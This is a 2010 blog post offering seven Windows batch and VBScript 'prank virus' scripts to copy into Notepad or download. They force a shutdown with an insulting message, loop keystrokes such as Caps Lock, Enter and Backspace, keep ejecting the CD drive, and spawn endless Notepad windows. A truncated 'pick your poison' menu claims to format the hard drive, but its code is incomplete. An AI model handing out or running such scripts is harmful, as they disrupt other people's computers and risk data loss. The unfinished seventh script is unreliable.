Sunday, October 24, 2010

Some tricks for make computer virus



WARNING: FOLLOWING TRICKS MAY HARMFUL FOR YOUR COMPUTER. SO PLEASE TRY THEM AT YOUR OWN RISKS.

Given below are some freaky tricks to make computer viruses. Just copy the given code in Notepad and save it accordingly.


1) Shutdown the computer with an error message: {Copy following code into notepad & save it accordingly}
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Virus1.bat"

2) Toggle Caps Lock button simultaneously: {Copy following code into notepad & save it accordingly}
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Virus2.vbs"

3) Continuously pop out your CD Drive: {Copy following code into notepad & save it accordingly}
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Virus3.vbs"

4) Hit Enter simultaneously: {Copy following code into notepad & save it accordingly}
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Virus4.vbs"

5) Hit Backspace simultaneously: {Copy following code into notepad & save it accordingly}
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Virus5.vbs"

6) Open Notepad continuously in your computer: {Copy following code into notepad & save it accordingly}
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Virus6.bat"

7) Hard prank: Pick your poison batch file. It asks you to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown {Copy following code into notepad & save it accordingly}
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Virus7.bat"

If you don't want to create viruses yourself, then you can download this viruses(!) directly from below:
Virus1
Virus2
Virus3
Virus4
Virus5
Virus6
Virus7

No comments:

Post a Comment